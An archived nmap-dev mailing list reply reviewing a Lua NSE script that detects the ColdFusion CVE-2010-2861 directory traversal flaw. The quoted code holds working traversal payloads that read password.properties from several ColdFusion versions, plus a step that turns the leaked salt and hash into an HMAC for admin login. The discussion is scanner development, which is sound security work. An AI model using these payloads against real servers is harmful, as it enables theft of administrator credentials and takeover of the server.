Nmap Development mailing list archives
Re: NSE: http-vuln-cve2010-2861 submission for review
From: Djalal Harouni <tixxdz () opendz org>
Date: Fri, 17 Feb 2012 12:22:49 +0100
Hi Micah, Thanks for the re-submission, and I've some notes: On Thu, Feb 16, 2012 at 09:59:56PM -0500, Micah wrote: [...]
-- If a page has both the salt and the password in it then the exploit has been successful if ( saltcontent and hashcontent ) then vuln.state = vulns.STATE.VULN
If it's vulnerable and exploitable you can make: vuln.state = vulns.STATE.EXPLOIT
-- Generate HMAC as this is what the web application needs for
authentication as admin
local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent,
hashcontent))
return true, string.format("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s",
hmaccontent, saltcontent, hashcontent)
end
end
return false, "Not vulnerable"
end
Even if it's not vulnerable, just return with: return vuln_report:make_output(vuln) This will make sure that non vulnerable issues are also counted.
local exploits = {
['CFusionMX'] =
'..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties\%00en',
['CFusionMX7'] =
'..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties\%00en',
['ColdFusion8'] =
'..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties\%00en',
['JRun4\\servers'] =
'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties\%00en',
}
local results = tab.new(2)
for prod, exploit in pairs(exploits) do
local status, result =
grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
tab.addrow(results, prod, result)
end
end
vuln.extra_info="\n" .. tab.dump(results)
For the extra info no need to use tab, just use a classic table: vuln.extra_info=table_results BTW these can be put in the: vuln.exploit_results table. Thanks. -- tixxdz http://opendz.org _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- NSE: http-vuln-cve2010-2861 submission for review Micah (Feb 16)
- Re: NSE: http-vuln-cve2010-2861 submission for review Djalal Harouni (Feb 17)
- Re: NSE: http-vuln-cve2010-2861 submission for review Djalal Harouni (Feb 17)
- Re: NSE: http-vuln-cve2010-2861 submission for review Patrik Karlsson (Feb 19)
- Re: NSE: http-vuln-cve2010-2861 submission for review Djalal Harouni (Feb 17)